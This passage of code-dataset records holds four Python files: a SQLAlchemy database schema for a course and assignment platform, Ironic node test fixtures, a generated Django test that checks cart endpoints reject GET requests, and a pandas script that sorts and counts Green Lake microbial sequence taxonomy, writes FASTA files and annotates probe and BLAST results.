UniqueConstraint, engine, Text)\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.sql import (Select, between, delete, desc, distinct, insert,\n join, select, update)\nfrom sqlalchemy.sql import func\nfrom sqlalchemy import CheckConstraint\nimport logging\nclass data():\n def __init__(self, used_engine: engine, create= True, log_format=None):\n \"\"\"Initiliaze data class. If engine is not provided tables are not set (call set_tables later)\n\n Arguments:\n used_engine {engine} -- [sqlalchemy engine]\n\n Keyword Arguments:\n create {bool} -- [If given will also insure tables exists, as well attempt to insert user roles] (default: {True})\n \"\"\"\n \n if not log_format:\n log_format = logging.Formatter(\"[%(asctime)s] %(levelname)s in %(funcName)-20s - %(thread)d: %(message)s\")\n\n logger = logging.getLogger(__name__)\n logger.handlers.clear()\n logger.setLevel(logging.INFO)\n handler = logging.StreamHandler()\n handler.setFormatter(log_format)\n logger.addHandler(handler)\n logger.propagate = False\n self.logger=logger\n self.logger.debug(\"Logger set up\")\n\n\n if used_engine is not None:\n self.set_tables(used_engine, create=create)\n else:\n self.engine=None\n\n\n def set_tables(self, used_engine: engine, create= True):\n \"\"\"set object tables\n\n Arguments:\n used_engine {engine} -- [sqlalchemy engine]\n\n Keyword Arguments:\n create {bool} -- [If given will also insure tables exists, as well attempt to insert user roles] (default: {True}] (default: {True})\n \"\"\"\n self.logger.info(\"defining tables\")\n \n if not os.environ.get(\"HEROKU\"):\n # sqlite doesn't enforce foreign keys by default, turning them on to enforce cascade\n def _fk_pragma_on_connect(dbapi_con, con_record):\n dbapi_con.execute('pragma foreign_keys=ON')\n\n from sqlalchemy import event\n event.listen(used_engine, 'connect', _fk_pragma_on_connect)\n\n metadata = MetaData(bind=used_engine)\n self.account = Table('account', metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"role_id\", Integer, ForeignKey(\n \"role.id\", ondelete=\"CASCADE\"), nullable=False),\n Column(\"creation date\", DateTime, nullable=False,\n server_default=func.now()),\n Column(\"username\", String(144), nullable=False),\n Column(\"salt\", String(144), nullable=False),\n Column(\"password\", String(144), nullable=False),\n Column(\"first_name\", String(144), nullable=False),\n Column(\"last_name\", String(144), nullable=False),\n UniqueConstraint(\n 'username', name='username_unique')\n )\n self.role = Table(\"role\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(20), nullable=False),\n UniqueConstraint('name', name='role_unique'\n ))\n\n self.course = Table(\"course\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"teacher_id\", Integer, ForeignKey(\n \"account.id\", ondelete=\"CASCADE\"), index=True, nullable=False),\n Column(\"name\", String(144), nullable=False),\n Column(\"description\", String(144)),\n Column(\"code\", String(8), nullable=False),\n Column(\"end_date\", Date),\n Column(\"creation_date\", DateTime, nullable=False,\n server_default=func.now())\n )\n self.course_student = Table(\"course_student\", metadata,\n Column(\"student_id\", Integer, ForeignKey(\n \"account.id\", ondelete=\"CASCADE\"),nullable=False, primary_key=True),\n Column(\"course_id\", Integer, ForeignKey(\n \"course.id\", ondelete=\"CASCADE\"),nullable=False, primary_key=True)\n )\n\n self.assignment = Table(\"assignment\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(500), nullable=False),\n Column(\"course_id\", Integer, ForeignKey(\n \"course.id\", ondelete=\"CASCADE\"), nullable=False),\n Column(\"reveal\", DateTime,\n server_default=func.now(), nullable=False),\n Column(\"deadline\", DateTime)\n )\n\n self.task = Table(\"task\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"number\", Integer, nullable=False),\n Column(\"points\", Integer, nullable=False),\n Column(\"description\", String(500)),\n Column(\"assignment_id\", Integer, ForeignKey(\n \"assignment.id\", ondelete=\"CASCADE\"), nullable=False)\n )\n\n self.file = Table(\"file\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(), nullable=False),\n Column(\"owner_id\", Integer, ForeignKey(\"account.id\", ondelete=\"CASCADE\"),nullable=False),\n Column(\"upload_date\", DateTime, nullable=False, server_default=func.now()),\n Column(\"binary_file\", LargeBinary()),\n Column(\"submit_id\", Integer, ForeignKey(\n \"submit.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"answer_id\", Integer, ForeignKey(\n \"answer.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"task_id\", Integer, ForeignKey(\n \"task.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"feedback_id\", Integer, ForeignKey(\n \"feedback.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"assignment_id\", Integer, ForeignKey(\n \"assignment.id\", ondelete=\"CASCADE\"), index=True),\n CheckConstraint(\"\"\"\n (CASE WHEN answer_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN submit_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN task_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN feedback_id IS NULL THEN 0 ELSE 1 END +\n CASE WHEN assignment_id IS NULL THEN 0 ELSE 1 END) \n = 1\"\"\", name='null file foreign keys')\n \n \n )\n \n\n self.answer = Table(\"answer\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"reveal\", DateTime,\n server_default=func.now(), nullable=False),\n Column(\"description\", String(500)), \n Column(\"task_id\", Integer, ForeignKey(\n \"task.id\", ondelete=\"CASCADE\"), unique=True, nullable=False),\n Column(\"reveal\", DateTime, nullable=False))\n\n self.submit = Table(\"submit\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"description\", String(500)),\n Column(\"task_id\", Integer, ForeignKey(\"task.id\", ondelete=\"CASCADE\"), index=True,nullable=False),\n \n Column(\"last_update\", DateTime, nullable=False, server_default=func.now()), \n \n Column(\"owner_id\", Integer, ForeignKey(\"account.id\", ondelete=\"CASCADE\"), index=True,nullable=False))\n\n self.feedback = Table(\"feedback\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"points\", Integer, nullable=False),\n Column(\"timestamp\", DateTime, nullable=False, server_default=func.now()),\n Column(\"modified\", DateTime),\n Column(\"description\", String(500)),\n Column(\"owner_id\", Integer, ForeignKey(\n \"account.id\"), nullable=False),\n Column(\"visible\", Boolean, nullable=False),\n Column(\"submit_id\", Integer, ForeignKey(\"submit.id\", ondelete=\"CASCADE\"), index=True,nullable=False))\n \n\n self.comment = Table(\"comment\", metadata,\n \n Column(\"id\", Integer, primary_key=True),\n Column(\"text\", Text),\n Column(\"modified\", DateTime),\n Column(\"user_id\", Integer, ForeignKey(\n \"account.id\"), nullable=False),\n Column(\"visible\", Boolean, nullable=False),\n Column(\"timestamp\", DateTime, nullable=False, server_default=func.now()),\n Column(\"submit_id\", Integer, ForeignKey(\n \"submit.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"answer_id\", Integer, ForeignKey(\n \"answer.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"task_id\", Integer, ForeignKey(\n \"task.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"assignment_id\", Integer, ForeignKey(\n \"assignment.id\", ondelete=\"CASCADE\"), index=True),\n Column(\"feedback_id\", Integer, ForeignKey(\n \"feedback.id\", ondelete=\"CASCADE\"), index=True),\n CheckConstraint(\"\"\"\n (CASE WHEN answer_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN submit_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN task_id IS NULL THEN 0 ELSE 1 END + \n CASE WHEN feedback_id IS NULL THEN 0 ELSE 1 END +\n CASE WHEN assignment_id IS NULL THEN 0 ELSE 1 END) \n = 1\"\"\", name='null comment foreign keys')\n \n )\n\n self.peer = Table(\"peer\", metadata,\n Column(\"submit_id\", Integer, ForeignKey(\"submit.id\", ondelete=\"CASCADE\"), index=True,nullable=False),\n \n Column(\"reciever_id\", Integer, ForeignKey(\"account.id\", ondelete=\"CASCADE\"), index=True,nullable=False),\n Column(\"reviewer_id\", Integer, ForeignKey(\"account.id\", ondelete=\"CASCADE\"), index=True,nullable=False),\n Column(\"review\", String(500), nullable=False),\n Column(\"deadline\", DateTime, nullable=False),\n Column(\"teacher_check\", Boolean, default = False)\n \n \n )\n self.file_log= Table(\"file_log\", metadata,\n Column(\"type\", String(50), nullable=False),\n Column(\"file_id\", Integer, ForeignKey(\n \"file.id\", ondelete=\"CASCADE\"),index=True, nullable=False),\n Column(\"user_id\", Integer, ForeignKey(\n \"account.id\"), nullable=False),\n Column(\"timestamp\", DateTime, nullable=False, server_default=func.now()),\n \n\n \n )\n\n\n self.engine=used_engine\n if create:\n self.logger.info(\"attempting create all\")\n metadata.create_all() # checks if table exsists first\n\n # insert 1 admin user, and roles \"USER\" and \"ADMIN to the database (if they don't exsist)\"\n\n with self.engine.connect() as conn:\n sql=self.role.insert().values(name = \"USER\", id = 1)\n\n # catches unqiue contraint fail\n try:\n\n conn.execute(sql)\n self.logger.info(\"user role inserted\")\n except:\n pass\n sql=self.role.insert().values(name = \"ADMIN\", id = 2)\n try:\n conn.execute(sql)\n self.logger.info(\"admin role inserted\")\n\n except:\n pass\n\n sql=self.role.insert().values(name = \"TEACHER\", id = 3)\n try:\n conn.execute(sql)\n self.logger.info(\"admin role inserted\")\n\n except:\n pass\n\n\n @staticmethod\n def drop_all(engine, tables=None):\n print(\"DROPPING TABLES\")\n meta = MetaData(bind=engine)\n meta.reflect(only=tables)\n if tables:\n raise NotImplementedError(\"TODO\")\n meta.drop_all()\n\n\n from ._user_service import delete_user, get_user_by_id, check_user, update_username\n from ._user_auth import get_user, hash_password, insert_user, update_password, get_role_id\n from ._course_service import insert_course, select_courses_teacher, select_courses_student, enlist_student, select_students, select_course_details, set_assignments\n from ._assignment_service import insert_assignment, insert_task, select_assignment, set_submits\n from ._file_service import select_file_details, get_file, update_file, insert_file_log, insert_files, check_user_view_rights, check_user_delete_rights\n from ._submit_service import update_submit, select_submits, get_simple_submit\n from ._teacher_stats import count_students\n from ._task_service import set_task_answer, update_answer\n from ._overview_service import get_all_submits, get_course_task_stats, get_first_downloads\n from ._view_rights import check_access_rights\n from ._feedback_service import update_feedback, grade_submit, delete_feedback, insert_feedback, select_feedback\n from ._comment_service import insert_comment,select_comments, update_comment, insert_comment_dict","sub_path":"application/database/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":13914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181171852","text":"\"\"\"Ironic test utilities.\"\"\"\n\nfrom ironic import test\nfrom ironic.openstack.common import jsonutils as json\nfrom ironic.db.sqlalchemy import models\n\n\ndef get_test_node(**kw):\n power_info = json.dumps({'driver': 'ipmi',\n 'user': 'fake-user', \n 'password': 'fake-password',\n 'address': 'fake-address'})\n node = models.Node()\n node.id = kw.get('id', 123)\n node.uuid = kw.get('uuid', '1be26c0b-03f2-4d2e-ae87-c02d7f33c123')\n node.cpu_arch = kw.get('cpu_arch', 'x86_64')\n node.cpu_num = kw.get('cpu_num', 4)\n node.local_storage_max = kw.get('local_storage_max', 1000)\n node.task_state = kw.get('task_state', 'NOSTATE')\n node.image_path = kw.get('image_path', '/fake/image/path')\n node.instance_uuid = kw.get('instance_uuid',\n '8227348d-5f1d-4488-aad1-7c92b2d42504')\n node.instance_name = kw.get('instance_name', 'fake-image-name')\n node.power_info = kw.get('power_info', power_info)\n node.extra = kw.get('extra', '{}')\n\n return node\n\ndef get_test_iface(**kw):\n iface = models.Iface()\n iface.id = kw.get('id', 987)\n iface.node_id = kw.get('node_id', 123)\n iface.address = kw.get('address', '52:54:00:cf:2d:31')\n\n return iface\n","sub_path":"ironic/tests/db/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"567692612","text":"from natspec_utils.stringutils import stringToUnicode as u;\n\nfrom django.test.testcases import TestCase\nfrom cuescience_cart.tests.support.support import TestSupport\n\n\n\n\nclass TestJustPostAllowed(TestCase):\n def setUp(self):\n self.test_support = TestSupport(self)\n\n def test(self):\n \"\"\"\n The code in this method is generated from: /de.iljabauer.projects.natspec.python/cuescience_cart/tests/views/test_just_post_allowed.natspec\n Never change this method or any contents of this file, all local changes will we overwritten.\n \"\"\"\n # Send get to /cart/add/1/\n response__cart_add_1_ = self.test_support.send_get_to_url(u(\"/cart/add/1/\"))\n \n # Assert status code: 405\n self.test_support.assert_status_code(405, response__cart_add_1_)\n \n # Send get to /cart/remove/1/\n response__cart_remove_1_ = self.test_support.send_get_to_url(u(\"/cart/remove/1/\"))\n \n # Assert status code: 405\n self.test_support.assert_status_code(405, response__cart_remove_1_)\n \n # Send get to /cart/update/\n response__cart_update_ = self.test_support.send_get_to_url(u(\"/cart/update/\"))\n \n # Assert status code: 405\n self.test_support.assert_status_code(405, response__cart_update_)\n \n ","sub_path":"cuescience_cart/tests/views/test_just_post_allowed.py","file_name":"test_just_post_allowed.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"468154291","text":"import pandas as pd\nimport numpy as np\nimport itertools\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\nindata = pd.read_csv('inputs/Combined_GreenLake_seqs.csv')\ntestdat= pd.read_csv('inputs/testset.csv')\ntestdat2= pd.read_csv('inputs/testset2.csv')\ntestdat3= pd.read_csv('inputs/TESTSET3.csv')\n\nall_seqs_tot=indata['Seq Count'].sum(axis=0) #total of all sequences\n\nwnthders=['OTU rep sequence ID', 'taxonomy', 'seq']\nnms=['k__Bacteria', 'k__Archaea','c__Epsilonproteobacteria','c__Gammaproteobacteria','c__Alphaproteobacteria','p__SAR406','o__Rhodobacterales','p__ZB3', 'p__SR1']\n\n# Output should look like: >OTU ID taxonomy seq full fasta file (all sequences)\n\nseqs_to_strip = ['k__', 'p__','c__','o__;','f__;','g__;','o__','f__','g__','s__','[',']']\n\n#set up taxonomy classification with indices and abbrev. keys\ntaxonomy_levels=pd.DataFrame(columns=['level','key'])\ntaxonomy_levels['level']=['kingdom', 'phylum', 'class', 'order', 'family', 'genus', 'species']\ntaxonomy_levels['key']= ['k__','p__','c__','o__','f__','g__','s__']\n\n\ndef strip_text(string):\n for seq in seqs_to_strip:\n string = string.replace(seq,'')\n string = string.replace('; ',';')\n string = string.strip()\n string = string + ';'\n string = string.replace(';;',';')\n string=string.rstrip(';')\n return string\n\ndef basic_strip(string,seqs):\n for seq in seqs:\n string = string.replace(seq,'')\n return string\n\ndef subst_ind(sb1,sb2,defau,string):\n try:\n ind1=string.index(sb1)+len(sb1)\n ind2=string.index(sb2)\n if(ind1 != ind2): #if c__ is not empty\n return string[ind1:ind2]\n else:\n return defau\n except ValueError: #if c__ does not exist\n return defau\n\ndef multi_str(string,sublist):\n vals=[]\n for x in sublist:\n val=string.find(x)\n vals.append(val)\n if any(val >= 0 for val in vals):\n return True\n else:\n return False\n\ndef phyl_subst_ind(sb1,sb2,tax_lev,string):\n# print('----------')\n# print('tax lev is',tax_lev)\n# print('string',string)\n tax_indup=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index-1)[0] #gets index of tax. one level above your tax. of interest\n tax_up=taxonomy_levels.key.iloc[tax_indup] #retrieves associated string abbrev.\n# print('tax up',tax_up)\n\n unclassend='; '+sb1[0] #ending would be '; ' + whatever your first substring passed in was\n# print('unclassend', unclassend)\n\n try:\n ind1=string.index(sb1)+len(sb1) #for example, if phylum, starts after p__\n ind2=string.index(sb2) #for example, if phylum, this is ; c__\n if(ind1 != ind2): #if level__ is not empty (if nothing was in between they'd be in the same spot)\n# print('if case')\n# print('returning',string[ind1:ind2])\n return string[ind1:ind2] #return what is in between them\n\n else:\n# print('else case')\n# print('returning',string[string.rfind('__',0,string.index(unclassend))],'through',string[string.index(unclassend)],'unclass. '+string[string.rfind('__',0,string.index(unclassend))+2:string.index(unclassend)])\n return 'unclass. '+string[string.rfind('__',0,string.index(unclassend))+2:string.index(unclassend)] # level__ is there but empty; Level above is not empty. For example: p__; c__ is there for phylum, this would be from the end of k__ and k__bacteria is there.\n\n\n except ValueError: #if ind2 is not there (so if you are looking for phylum, there is no ; p in this case to use as index\n# print('val error case')\n\n lstind=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index)[0] #index to start a lst from taxonomic level of interest\n newtaxlst=taxonomy_levels['key'][:lstind] #the lst\n# print('new tax list', newtaxlst)\n newtaxlst.reset_index(drop = True, inplace = True) #reset indexing incase it got weird in dataframe\n# print('rest inds new tax list',newtaxlst)\n for i in reversed(newtaxlst): #starting at taxonomic level of interest, go in reverse order taxonomically, go back to higher levels\n key=i\n# print('key',key, 'index', string.find(key))\n if string.find(key)!=-1: #if its there (note- string.find will return -1 if it cant find substr, .index returns val error\n revInd=string.index(key)+len(key) #because index starts at beginning of key, add length of key\n# print('revInd',revInd)\n# print('returning unclass. ',string[string.rfind('__',0,revInd)+2:revInd]) #as with key, need to add length of substring to omit\n# print('----------')\n return 'unclass. '+string[string.rfind('__',0,revInd)+2:revInd]\n break\n\n\ndef fasta_out(dat,hds,cats=None,of='outputs',copof='pa_inputs', wantcop=False): #feed in master data file, fasta headers, and cats (what you are sorting for)\n indata3=dat.copy()\n if cats==None: #if you don't want to sort...convert entire file to fasta format and save\n indata2 = dat.copy()\n indata2['taxonomy'] = indata2['taxonomy'].map(lambda x: strip_text(x)) #strip unwanted chars for FASTA\n np.savetxt(of+'/fasta_GreenLake_all_seqs.fasta', indata[hds].values, fmt='%s|%s\\n%s') #FASTA format\n else:\n d = {name:dat for name in cats} #dictionary associates a name with each cateogry in dataframe\n for name, dat in d.items():\n# print('function name1', name)\n name2=strip_text(name) #name2 is used for output(strips away KPSOFGS class.)\n# print('name2',name2)\n name2dat=dat.loc[dat.taxonomy.str.contains(name, na=False)] #find all occurences of category\n name2dat.to_csv(of+'/fasta_GreenLake_'+name2+'_seqs.csv', index=False) #save csv version\n \n if wantcop==True:\n name2dat.to_csv(copof+'/fasta_GreenLake_'+name2+'_seqs.csv', index=False) #save copy to pa input\n \n name2dat['taxonomy'] = name2dat['taxonomy'].map(lambda x: strip_text(x)) #strip unwanted chars for FASTA\n np.savetxt(of+'/fasta_GreenLake_'+name2+'_seqs.fasta', name2dat[hds].values, fmt='%s|%s\\n%s') #FASTA format\n\n indata3['bools'] = indata3.taxonomy.map(lambda x: multi_str(x, cats)) #boolean index all data- False means didn't fall into any cat.\n indata3=indata3.loc[indata3.bools.values==False] #find where boolean index is False and make that the dataframe\n indata3.drop('bools',1,inplace=True)\n indata3.to_csv(of+'/fasta_GreenLake_unassigned_seqs.csv', index=False) #save csv version\n indata3['taxonomy'] = indata3['taxonomy'].map(lambda x: strip_text(x)) #strip unwanted chars for FASTA\n np.savetxt(of+'/fasta_GreenLake_unassigned_seqs.fasta', indata3[hds].values, fmt='%s|%s\\n%s') #FASTA format\n\n\ndef list_loader(dat,tax_lev,of='outputs',nm='',ks='b',outf=True):\n ct=pd.DataFrame(columns=[tax_lev,'total']) #set up an empty dataframe; note: only define columns you append to while empty\n print(ct) #otherwise define during calculation\n seqs=['[',']']\n \n tax_indup=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index-1)[0] #find index of tax. level 1 above yours\n tax_up=taxonomy_levels.level.iloc[tax_indup] #retreive string\n \n key1=taxonomy_levels.loc[taxonomy_levels.level==tax_lev].key.values[0] #key 1 is substring 1 (tax. level before name) (key is the abbrev.)\n #######\n #set up for substring two (where your taxonomic name of interest ends)\n downind=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index+1)[0] #gets index of your tax level of interest and goes down one\n key2=taxonomy_levels.key.iloc[downind] #retrieves actual text taxonomic level from indexed location\n #######\n dat['Subs']=dat.taxonomy.map(lambda x: phyl_subst_ind(key1,'; '+key2,tax_lev,x)) #find all phyla\n dat['Subs']=dat.Subs.map(lambda x: basic_strip(x,seqs))\n\n sort_lst=dat.Subs.unique() #unique phyla\n for thing in sort_lst:\n ctdat=dat.loc[dat.Subs==thing] #find all occurences of category\n counts=ctdat['Seq Count'].values\n tot=np.sum(counts)\n ct = ct.append(pd.DataFrame([[thing,tot]],columns=[tax_lev,'total']))\n ct.reset_index(drop=True,inplace=True) #ct.append does now allow reindexing, so this modifies indices\n dat.drop('Subs',1,inplace=True)\n ta=ct['total'].sum(axis=0)\n ct['tax. depth int. ra']=ct['total'].apply(lambda x:x/ta) #depth integrated relative abundance at taxonomic level\n print(ct)\n if ks=='b':\n ct['king. depth int ra']=ct['total'].apply(lambda x:x/bact_tot)\n elif ks=='a':\n ct['king. depth int ra']=ct['total'].apply(lambda x:x/arch_tot)\n if outf==True:\n ct.to_csv(of+'/GreenLake_'+tax_up+nm+'counts.csv', index=False) #save csv version\n print(ct)\n return sort_lst, ct\n\ndef tax_hist(ctdat, of='outputs',nm=''):\n\n tax_lev=ctdat.columns.values[0]\n hdlst=[tax_lev,ctdat.columns.values[ctdat.columns.get_loc('total')]]\n #finds headers for appropriate taxonomic column and total column\n print('hdlist',hdlst)\n taxdat=ctdat[hdlst]\n tax_indup=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev].index-1)[0] #find index of tax. level 1 above yours\n tax_up=taxonomy_levels.level.iloc[tax_indup] #retreive string\n \n ax1 = taxdat.plot(x=tax_lev,kind='bar', edgecolor='black',legend=False)\n\n for tick in ax1.yaxis.get_major_ticks():\n tick.label.set_fontsize(10)\n for tick in ax1.xaxis.get_major_ticks():\n tick.label.set_fontsize(6)\n\n plt.xlabel(tax_lev, fontsize=14)\n plt.ylabel('Counts')\n plt.yscale('log')\n plt.title('Fayetteville Green Lake taxa: '+tax_up+' '+nm, fontsize=14)\n\n rects = ax1.patches\n labels = taxdat['total']\n\n for rect, label in zip(rects, labels):\n height = rect.get_height()\n ax1.text(rect.get_x() + rect.get_width()/2, height + 2.3**(np.log(label)-1), label, fontsize=5,fontweight='bold',color='r',ha='center', va='bottom', rotation=90)\n\n ax1.set_ylim((ax1.get_ylim()[0],ax1.get_ylim()[1]*3.5))\n plt.tight_layout()\n\n plt.savefig(of+'/'+tax_up+nm+'hist.pdf')\n plt.close()\n\ndef find_sum(dat,name):\n name2=strip_text(name) #name2 is used for output(strips away KPSOFGS class.)\n# print('name2',name2)\n name2dat=dat.loc[dat.taxonomy.str.contains(name, na=False)] #find all occurences of category\n tot=name2dat['Seq Count'].sum(axis=0)\n return tot\n\ndef pcnt_community(dat,num,den):\n num_tot=find_sum(dat,num)\n den_tot=find_sum(dat,den)\n pcnt = num_tot/den_tot*100\n return pcnt\n\n\ndef tax_range(tax_lev1='phylum', tax_lev2='genus'): #default settings: from phlyum through genus (not species b/c at that level nothing to further classify\n tax_ind1=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev1].index)[0]\n tax_ind2=(taxonomy_levels.loc[taxonomy_levels.level==tax_lev2].index)[0]\n\n return tax_ind1,tax_ind2\n\ndef probe_base_reform(dat,of='outputs'): #for this function, use csv reader WITHOUT headers to load. for files that are messed up with mismatch columns separated into 2\n droplst=[]\n tempdat=dat.copy()\n filtered_data = tempdat.dropna(axis='columns', how='all') #get rid of columns where all elements = NaN (gets rid of the empty column that always appears after 'probe name' column\n r=np.arange(int(filtered_data.shape[1]/4))\n\n for i in range(1,len(r)):\n col=r[i]*4-1 #starting at 1, go to every 3rd column (i.e., 3, 6, 9, etc.)\n droplst.append(col-1)\n nanBool=pd.isnull(filtered_data.iloc[:,col]) #for each 3rd column, get boolean values (looking for NaN)\n nanInds=nanBool.index[nanBool==True].tolist() #get indexes of rows containing NaN\n for j in range(len(nanInds)):#for each of those indices\n if str(filtered_data.iloc[nanInds[j],col-1]).find('Mismatch')>-1:#if the corresponding row one\n filtered_data.iloc[nanInds[j],col]=filtered_data.iloc[nanInds[j],col-1] #set the column NaN value to the value one column to the left\n\n filtered_data.drop(filtered_data.columns[droplst],axis=1,inplace=True)#refilter, getting rid of the columns with data merged into every 3rd column\n filtered_data.to_csv(of+'/test.csv',index=False)\n\ndef probe_base_sep(dat,probe_props,of='outputs',mms=0):#import csv with header=None\n tempdat=dat.copy()\n tempdat2=probe_props.copy()\n probe_list=tempdat.iloc[:,0].map(lambda x: x.replace('Probename: ','')) #do not use strip because that does not use substring, but all combos of characters\n print('probe list from datas',probe_list)\n i=0\n for name in probe_list:\n if tempdat2['Probe name'].str.contains(name).any()==True: #only further process the probe hit data for probes in possible probes list\n print('i is',i,'probe name',name)\n print('row is',tempdat.loc[i])\n bools=tempdat.loc[i].str.match('Targetsequence: ')\n boolInds=bools.index[bools==True].tolist()\n print('bool inds',boolInds)\n sct=tempdat.iloc[i,boolInds]\n sct=sct.map(lambda x: x.replace('Targetsequence: ',''))\n sct.to_csv(of+'/'+name+'_'+str(mms)+'mms.csv',index=False)\n i=i+1\n else:\n i=i+1 #skip over the unmatched probe name\n\ndef probe_tmelt(dat): #calculates probe melting T according to formula Tm=64.9 + 41 x ((G + C - 16.4)/length). Annealing T for hybridization is ~5C below Tm.\n tempdat=dat.copy()\n tempdat['tmelt']=64.9+41*(((tempdat['G+C content(%)']/100*tempdat['Length (nt)'])-16.4)/tempdat['Length (nt)'])\n\ndef probe_prop_asc(probe_props): #sorts list of probe properties in descending order (Greatest No. of target hits to least no of target hits)Import csv w hdrs\n tempdat=probe_props.copy()\n tempdat.sort_values(by=['No. of target hits'], axis=0, ascending=False, inplace=True)\n tempdat.reset_index(inplace=True)\n \n return tempdat\n \ndef nested_probe_narrow(probe_props,seqDir,of='outputs',mms=0):\n tempdat0=probe_props.copy() #testProbe probe properties table\n sorteddat=probe_prop_asc(tempdat0) #sort from most to least sequence hits\n probenames=sorteddat['Probe name']\n \n for i,name in enumerate(probenames):\n indata=pd.read_csv(seqDir+'/'+name+'_'+str(mms)+'mms.csv',header=None)\n print('indata file',seqDir+'/'+name+'_'+str(mms)+'mms.csv','shape',indata.shape)\n tempdat1=indata.copy()\n \n for j in range(i+1,len(probenames)):\n indata2=pd.read_csv(seqDir+'/'+probenames[j]+'_'+str(mms)+'mms.csv',header=None)\n tempdat2=indata2.copy()\n print('nested indata file',j,seqDir+'/'+probenames[j]+'_'+str(mms)+'mms.csv','shape',indata2.shape)\n\n for seq in tempdat1[0]: #just one column, so iloc not necessary; for each sequence in file with more entries\n if tempdat2[0].str.contains(seq).any()==True: #if that sequence is anywhere in the smaller file\n bools=tempdat2[0].str.contains(seq)\n boolInds=bools.index[bools==True].tolist() #get the index of that location in the smaller file\n tempdat2.drop(tempdat2.index[boolInds],inplace=True) #drop the entry from smaller file\n tempdat2.reset_index(inplace=True)\n \n if tempdat2.shape[0]>0: #if any entries are left in the file, save it\n tempdat2.to_csv(of+'/test'+probenames[j]+'.csv',index=False,header=None)\n \ndef probe_narrower(probe_props,datDir,of='outputs',mms=0):\n tempdat0=probe_props.copy()\n sorteddat=probe_prop_asc(tempdat0) #sort from most to least sequence hits\n probenames=sorteddat['Probe name']\n \n concatFrames=[]\n \n for name in probenames: #import all the probe files as individual dataframes named 'probename_indata'\n name2=name+'_indata'\n \n name2=pd.read_csv(datDir+'/'+name+'_'+str(mms)+'mms.csv',header=None, names=['Sequence']) #explicitly set header=None to rename column through names arg\n name2.insert(loc=0,column='probe',value=name) #insert column filled with probe name at column position 0\n \n concatFrames.append(name2)\n \n merged=pd.concat(concatFrames)\n merged.reset_index(inplace=True)\n \n uniqueSeqs=merged.Sequence.unique()\n \n probeBoolDat=pd.DataFrame(columns=['Sequence']+probenames.tolist())\n \n probeBoolRowList=[]\n for uSeq in uniqueSeqs:\n probeBoolRow=pd.DataFrame(columns=['Sequence']+probenames.tolist())\n SeqProbeDat=merged.loc[merged.Sequence==uSeq]\n probeBoolRow.set_value(0,col='Sequence',value=uSeq)\n \n for name in probenames:\n probeBoolRow.set_value(0,col=name,value=SeqProbeDat['probe'].str.match(name))\n probeBoolRowList.append(probeBoolRow)\n\n \n print('dataframe list',probeBoolRowList)\n probeBoolDat = pd.concat(probeBoolRowList)\n print('final probe bool dat',probeBoolDat)\n \ndef blast_anot(dat,acckey,hits,of='blast_altered',ctLev='f__',metaD=True):\n dat=dat.copy()\n hits=hits.copy()\n acckey=acckey.copy()\n \n cols=['Query','Subject Accession','Percent Similarity']\n\n concatList=[]\n accs=acckey['Accession']\n\n for i, entry in enumerate(accs):\n entrydat=entry+'_dat'\n entrydat=(hits.loc[hits['Subject Accession'].str.match(entry)])[cols]\n entrydat.insert(loc=3,column='Subject Definition',value=acckey.Description.iloc[i])\n entrydat.insert(loc=4,column='Taxonomy',value=acckey.Taxonomy.iloc[i])\n concatList.append(entrydat)\n\n merged=pd.concat(concatList)\n\n merged.drop(merged[merged['Percent Similarity']<97].index,inplace=True)\n merged.reset_index(drop=True,inplace=True)\n\n for i, name in enumerate(merged['Query']):\n print('name is',name)\n print('to replace',(dat.loc[dat['OTU ID'].str.match(name)])['taxonomy'])\n print('replace with', merged.Taxonomy.iloc[i])\n \n blastTax=merged.Taxonomy.iloc[i]\n blastOrd=blastTax[blastTax.find(ctLev):blastTax.find(';',beg=blastTax.find(ctLev))]\n \n dat.replace(to_replace=(dat.loc[dat['OTU ID'].str.match(name)&dat['taxonomy']])['taxonomy'], value=merged.Taxonomy.iloc[i], inplace=True)\n\n dat.reset_index(drop=True,inplace=True)\n\n print('final data',dat)\n\n\n####actual data processing\n\n#fasta_out(indata,wnthders,wantcop=True)\n#fasta_out(indata,wnthders,nms,wantcop=True)\n\n#bact_indata=pd.read_csv('outputs/fasta_GreenLake_Bacteria_seqs.csv')\n#arch_indata=pd.read_csv('outputs/fasta_GreenLake_Archaea_seqs.csv')\n#unclass_indata=pd.read_csv('outputs/fasta_GreenLake_unassigned_seqs.csv')\n#\n#bact_tot=bact_indata['Seq Count'].sum(axis=0)\n#arch_tot=arch_indata['Seq 